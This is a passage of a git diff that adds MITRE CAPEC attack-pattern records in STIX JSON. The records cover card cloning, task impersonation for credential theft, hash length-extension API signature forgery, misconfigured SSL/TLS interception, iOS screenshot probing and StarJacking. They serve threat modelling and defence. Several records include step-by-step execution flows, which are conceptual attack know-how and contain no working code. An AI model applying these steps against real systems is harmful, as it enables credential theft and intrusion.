By swiping a valid card, it becomes trivial to make any number of duplicates that function as the original.", + "external_references": [ + { + "external_id": "CAPEC-397", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/397.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--19015961-475c-438b-887b-e3d66a9143de", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Cloning Magnetic Strip Cards", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7.json new file mode 100644 index 0000000000000000000000000000000000000000..669b4c4497189d1aa9ea5f16471d3ab486a44977 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7.json 
@@ -0,0 +1,104 @@ +{ + "id": "bundle--db94adc9-24f3-4de6-9423-e579a85ebf62", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary who is authorized or has the ability to search known system resources, does so with the intention of gathering useful information. System resources include files, memory, and other aspects of the target system. In this pattern of attack, the adversary does not necessarily know what they are going to find when they start pulling data. This is different than CAPEC-150 where the adversary knows what they are looking for due to the common location.", + "external_references": [ + { + "external_id": "CAPEC-545", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/545.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1243", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1243.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "external_id": "CWE-1278", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1278.html" + }, + { + "external_id": "CWE-1323", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1323.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1330.html" + }, + { + "description": "Data from Local System", + "external_id": 
"T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + }, + { + "description": "Credentials from Password Stores:Keychain", + "external_id": "T1555.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1555/001" + } + ], + "id": "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Pull Data from System Resources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95" + ], + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "attack-pattern--9a7492fa-b46e-48bc-aae9-beb1d359171e" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1995c522-a25d-46e4-b024-65172771a692.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1995c522-a25d-46e4-b024-65172771a692.json new file mode 100644 index 0000000000000000000000000000000000000000..590f4788a0de04ca00727745a1860271efe6aa65 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1995c522-a25d-46e4-b024-65172771a692.json 
@@ -0,0 +1,83 @@ +{ + "id": "bundle--2a9f2807-2288-4e5f-9060-99b0743a55a1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, impersonates an expected or routine task in an attempt to steal sensitive information or leverage a user's privileges.", + "external_references": [ + { + "external_id": "CAPEC-504", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/504.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Masquerading: Masquerade Task or Service", + "external_id": "T1036.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/004" + }, + { + "description": "Adrienne Porter Felt, David Wagner, Phishing on Mobile Devices, 2011, University of California, Berkeley", + "external_id": "REF-434", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf" + } + ], + "id": "attack-pattern--1995c522-a25d-46e4-b024-65172771a692", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Task Impersonation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary monitors the system task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. 
Once the task is executed, the adversary impersonates the credential prompt to obtain the user's Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user's encrypted email.", + "An adversary prompts a user to authorize an elevation of privileges, implying that a background task needs additional permissions to execute. The user accepts the privilege elevation, allowing the adversary to execute additional malware or tasks with the user's privileges." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine suitable tasks to exploit: Determine what tasks exist on the target system that may result in a user providing sensitive information.

  2. Techniques
    Determine what tasks prompt a user for their credentials.
    Determine what tasks may prompt a user to authorize a process to execute with elevated privileges.

Exploit

  1. Impersonate Task: Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials or to ride the user's privileges.

  2. Techniques
    Prompt a user for their credentials, while making the user believe the credential request is legitimate.
    Prompt a user to authorize a task to run with elevated privileges, while making the user believe the request is legitimate.
", + "x_capec_extended_description": "\n When impersonating an expected task, the adversary monitors the task list maintained by the operating system and waits for a specific legitimate task to become active. Once the task is detected, the malicious application launches a new task in the foreground that mimics the user interface of the legitimate task. At this point, the user thinks that they are interacting with the legitimate task that they started, but instead they are interacting with the malicious application. Once the adversary's goal is reached, the malicious application can exit, leaving the original trusted application visible and the appearance that nothing out of the ordinary has occurred.\n A second approach entails the adversary impersonating an unexpected task, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process requires authentication for some purpose. The user, believing they are interacting with a legitimate task, enters their credentials or authorizes the use of their stored credentials, which the adversary then leverages for nefarious purposes. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user, but may also be used to ride the user's privileges.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--f7a0e7bd-d24a-4390-b365-9e71f22e4e06" + ], + "x_capec_prerequisites": [ + "The adversary must already have access to the target system via some means.", + "A legitimate task must exist that an adversary can impersonate to glean credentials.", + "The user's privileges allow them to execute certain tasks with elevated privileges." + ], + "x_capec_resources_required": [ + "Malware or some other means to initially comprise the target system.", + "Additional malware to impersonate a legitimate task." 
+ ], + "x_capec_skills_required": { + "Low": "Once an adversary has gained access to the target system, impersonating a task is trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f.json new file mode 100644 index 0000000000000000000000000000000000000000..d258fcac76c0bf57c8dcbf16c76aea81d0f7b510 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--588b29c5-0fe5-4fda-a109-8e91ec1b71a3", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated. Please refer to CAPEC:30 - Hijacking a Privileged Thread of Execution.", + "external_references": [ + { + "external_id": "CAPEC-235", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/235.html" + } + ], + "id": "attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Implementing a callback to system routine (old AWT Queue)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810.json new file mode 100644 index 0000000000000000000000000000000000000000..0a70eb1beb15140002e643a8507c9651d03014e1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810.json 
@@ -0,0 +1,89 @@ +{ + "id": "bundle--636f8208-f395-47ef-8d5d-e75c55cd081c", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits missing or incorrectly configured access control within registers to read/write data that is not meant to be obtained or modified by a user.\n ", + "external_references": [ + { + "external_id": "CAPEC-680", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-1224", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1224.html" + }, + { + "external_id": "CWE-1231", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1231.html" + }, + { + "external_id": "CWE-1233", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1233.html" + }, + { + "external_id": "CWE-1262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1262.html" + }, + { + "external_id": "CWE-1283", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1283.html" + }, + { + "description": "Brandon Hill, Huge Intel CPU Bug Allegedly Causes Kernel Memory Vulnerability With Up To 30% Performance Hit In Windows And Linux, 2018--01---02, David Altavilla and Hot Hardware, Inc", + "external_id": "REF-693", + "source_name": "reference_from_CAPEC", + "url": "https://hothardware.com/news/intel-cpu-bug-kernel-memory-isolation-linux-windows-macos" + } + ], + "id": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Exploitation of Improperly Controlled Registers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + 
"attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Hardware", + "Hardware" + ], + "x_capec_example_instances": [ + "\n During a System-on-Chip's (SoC) secure boot process, the code to be authenticated is measured to determine the code's validity. This entails the one-way hash of the code binary being calculated and extended to the previous hash. The value obtained after completion of the boot flow is then stored in a register with the intent of later verifying this value to determine if the boot flow has been tampered with. However, the register being used does not prevent an adversary from modifying the register's contents, which can result in the adversary spoofing the measurement data used in the attestation process.\n " + ], + "x_capec_extended_description": "\n Hardware systems often utilize trusted lock bits to prevent a set of registers from being written to or to restrict a register to only being written to once. Registers are also frequently used to store sensitive data leveraged in additional security operations, such as secure booting, authenticating code, device attestation, and more. However, the access control mechanisms meant to protect these registers may be fully missing or ineffective due to misconfiguration. If an adversary is able to discover improper access controls surrounding registers, it could result in the adversary obtaining sensitive data and/or modifying data that is meant to be immutable. This can ultimately result in processes like secure boot being circumvented or in protected configurations being modified.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Awareness of the hardware being leveraged.", + "Access to the hardware being leveraged." + ], + "x_capec_skills_required": { + "High": "Intricate knowledge of registers." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b.json new file mode 100644 index 0000000000000000000000000000000000000000..fe1b67ca07fbb46c53edd17e2569bbb262f93ca0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b.json 
@@ -0,0 +1,49 @@ +{ + "id": "bundle--c2028186-466a-483d-a7f6-4e08e4c476e5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary examines screenshot images created by iOS in an attempt to obtain sensitive information. This attack targets temporary screenshots created by the underlying OS while the application remains open in the background.", + "external_references": [ + { + "external_id": "CAPEC-498", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/498.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + }, + { + "description": "Jonathan Zdziarksi, Hacking and Securing iOS Applications (First Edition), 2012, O'Reilly Media, Inc.", + "external_id": "REF-426", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Probe iOS Screenshots", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "These images are used by iOS to aid in the visual transition between open applications and improve the user's experience with a device. An application can be at risk even if it properly protects sensitive information when at rest. If the application displays sensitive information on the screen, then the potential exists for iOS to unintentionally record that information in an image file. An adversary can retrieve these images either by gaining access to the image files, or by physically obtaining the device and leveraging the multitasking switcher interface. 
This attack differs from CAPEC-648, which targets intentional screenshots initiated by an end-user that are stored in the device's storage.", + "x_capec_prerequisites": [ + "This type of an attack requires physical access to a device to either excavate the image files (potentially by leveraging a Jailbreak) or view the screenshots through the multitasking switcher (by double tapping the home button on the device)." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29.json new file mode 100644 index 0000000000000000000000000000000000000000..c406bf33fb66e5a99baea9a26457826dfd88e149 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29.json 
@@ -0,0 +1,71 @@ +{ + "id": "bundle--6434e7d1-ebde-47e1-93b8-51164cc526b0", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary utilizes a hash function extension/padding weakness, to modify the parameters passed to the web service requesting authentication by generating their own call in order to generate a legitimate signature hash (as described in the notes), without knowledge of the secret token sometimes provided by the web service.", + "external_references": [ + { + "external_id": "CAPEC-461", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/461.html" + }, + { + "external_id": "CWE-328", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/328.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Thai Duong, Juliano Rizzo, Flickr's API Signature Forgery Vulnerability, 2009--09---28", + "external_id": "REF-398", + "source_name": "reference_from_CAPEC", + "url": "http://netifera.com/research/flickr_api_signature_forgery.pdf" + } + ], + "id": "attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Services API Signature Forgery Leveraging Hash Function Extension Weakness", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "To leverage an attack against the has function extension / padding weakness, consider the message to be passed to the web service is M (this message includes the parameters passed to the web service concatenated with the secret token / key 
bytes). The message M is hashed and that hash is passed to the web service and is used for authentication. The attacker does not know M, but can see Hash (M) and Length (M). The attacker can then compute Hash (M || Padding (M) || M') for any M'. The attacker does not know the entire message M, specifically the attacker does not know the secret bytes, but that does not matter. The attacker is still able to sign their own message M' and make the called web service verify the integrity of the message without an error." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find a vulnerable web service: The adversary finds a web service that uses a vulnerable authentication scheme, where an authentication token is concatenated with the parameters of a request and then hashed

  2. Techniques
    Read application documentation to learn about authentication schemes being used
    Observe web service traffic to look for vulnerable authentication schemes

Experiment

  1. Attempt adding padding to parameters: An adversary tests if they can simply add padding to the parameters of a request such that the request is technically changed, with the hash remaining the same

  2. Techniques
    Exploit the hash function extension / padding weakness with only padding to test the weakness

Exploit

  1. Add malicious parameters to request: Add malicious parameters to a captured request in addition to what is already present. Do this by exploiting the padding weakness of the hash function and send the request to the web service so that it believes it is authenticated and acts on the extra parameters.

  2. Techniques
    Exploit the hash function extension / padding weakness by adding malicious parameters to a web service request such that it is still deemed authentic
", + "x_capec_extended_description": "\n When web services require callees to authenticate, they sometimes issue a token / secret to the caller that the caller is to use to sign their web service calls. In one such scheme the caller, when constructing a request, would concatenate all of the parameters passed to the web service with the provided authentication token and then generate a hash of the concatenated string (e.g., MD5, SHA1, etc.). That hash then forms the signature that is passed to the web service which is used on the server side to verify the origin authenticity and integrity of the message. Because of the iterative design of the hash function, it is possible, from only the hash of a message and its length, for an adversary to conduct signature forgery by computing the hash of longer messages that start with the initial message and include the padding required for the initial message to reach a multiple of 512 bits. It is important to note that the attack not limited to MD5 and will work on other hash functions such as SHA1.\n ", + "x_capec_prerequisites": [ + "Web services check the signature of the API calls", + "Authentication tokens / secrets are shared between the server and the legitimate client", + "The API call signature is generated by concatenating the parameter list with the shared secret and hashing the result.", + "An iterative hash function like MD5 and SHA1 is used.", + "An attacker is able to intercept or in some other way gain access to the information passed between the legitimate client and the server in order to retrieve the hash value and length of the original message.", + "The communication channel between the client and the server is not secured via channel security such as TLS" + ], + "x_capec_resources_required": [ + "\n Access to a function to produce a hash (e.g., MD5, SHA1)\n Tools that allow the attacker to intercept a message between the client and the server, specifically the hash that is the signature and the length of 
the original message concatenated with the secret bytes\n " + ], + "x_capec_skills_required": { + "Medium": "Medium level of cryptography knowledge, specifically how iterative hash functions work. This is needed to select proper padding." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf.json new file mode 100644 index 0000000000000000000000000000000000000000..00843a03e69bd3e765151b4b10f6346c885c0df3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf.json 
@@ -0,0 +1,67 @@ +{ + "id": "bundle--f00cf944-e2b2-4c96-9229-e5db9e6b4908", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary takes advantage of incorrectly configured SSL/TLS communications that enables access to data intended to be encrypted. The adversary may also use this type of attack to inject commands or other traffic into the encrypted stream to cause compromise of either the client or server.", + "external_references": [ + { + "external_id": "CAPEC-217", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/217.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Exploiting Incorrectly Configured SSL/TLS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "Using MITM techniques, an adversary launches a blockwise chosen-boundary attack to obtain plaintext HTTP headers by taking advantage of an SSL session using an encryption protocol in CBC mode with chained initialization vectors (IV). This allows the adversary to recover session IDs, authentication cookies, and possibly other valuable data that can be used for further exploitation. 
Additionally this could allow for the insertion of data into the stream, allowing for additional attacks (CSRF, SQL inject, etc) to occur." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine SSL/TLS Configuration: Determine the SSL/TLS configuration of either the server or client being targeted, preferably both. This is not a hard requirement, as the adversary can simply assume commonly exploitable configuration settings and indiscriminately attempt them.

  2. Techniques
    If the target is a webpage, some of the SSL/TLS configuration can be viewed through the browser's security information, such as the key sizes and cipher being used.

Experiment

  1. Intercept Communication: Provide controlled access to the server by the client, by either providing a link for the client to click on, or by positioning one's self at a place on the network to intercept and control the flow of data between client and server, e.g. AiTM (adversary in the middle - CAPEC-94).

  2. Techniques
    Create a malicious webpage that looks identical to the target webpage, but routes client traffic to the server such that the adversary can observe the traffic and perform an adverary in the middle attack.
    If the adversary has access to the network that either the client or server is on, the can attempt to use a packet sniffer to perform an adversary in the middle attack.
    Install a packet sniffer through malware directly to a client device that can intercept SSL/TLS traffic and perform an adversary in the middle attack.

Exploit

  1. Capture or Manipulate Sensitive Data: Once the adversary has the ability to intercept the secure communication, they exploit the incorrectly configured SSL to view the encrypted communication. The adversary can choose to just record the secure communication or manipulate the data to achieve a desired effect.

  2. Techniques
    Use known exploits for old SSL and TLS versions.
    Use known exploits for weak ciphers such as DES and RC4.
", + "x_capec_extended_description": "SSL/TLS communications become vulnerable to this attack when they use outdated versions and insecure ciphers. Currently, all SSL versions are deprecated and TLS versions 1.0 and 1.1 are also deprecated due to being insecure. It is still possible for later versions of TLS to be insecure if they are configured with insecure ciphers such as 3DES or RC4.", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Access to the client/server stream." + ], + "x_capec_resources_required": [ + "The adversary needs the ability to sniff traffic, and optionally be able to route said traffic to a system where the sniffing of traffic can take place, and act upon the recovered traffic in real time." + ], + "x_capec_skills_required": { + "High": "The adversary needs real-time access to network traffic in such a manner that the adversary can grab needed information from the SSL stream, possibly influence the decided-upon encryption method and options, and perform automated analysis to decipher encrypted material recovered. Tools exist to automate part of the tasks, but to successfully use these tools in an attack scenario requires detailed understanding of the underlying principles." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb.json new file mode 100644 index 0000000000000000000000000000000000000000..9619832f6b37f2e1150ac15cc354925e906364f2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb.json 
@@ -0,0 +1,29 @@ +{ + "id": "bundle--b5f5521c-c5df-4f38-a4fd-3bd5ed5a5289", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-448 : Embed Virus into DLL. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-450", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/450.html" + } + ], + "id": "attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DEPRECATED: Malware Propagation via USB U3 Autorun", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d.json new file mode 100644 index 0000000000000000000000000000000000000000..31bfe47da826ae1787b2726e162814b073ce6eb2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d.json 
@@ -0,0 +1,79 @@ +{ + "id": "bundle--953e701a-0442-477d-be02-d81ca629f9b5", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary spoofs software popularity metadata to deceive users into believing that a maliciously provided package is widely used and originates from a trusted source.\n ", + "external_references": [ + { + "external_id": "CAPEC-693", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Tzachi Zornstein, StarJacking – Making Your New Open Source Package Popular in a Snap, 2022--04---19, Checkmarx", + "external_id": "REF-721", + "source_name": "reference_from_CAPEC", + "url": "https://checkmarx.com/blog/starjacking-making-your-new-open-source-package-popular-in-a-snap/" + } + ], + "id": "attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "StarJacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute 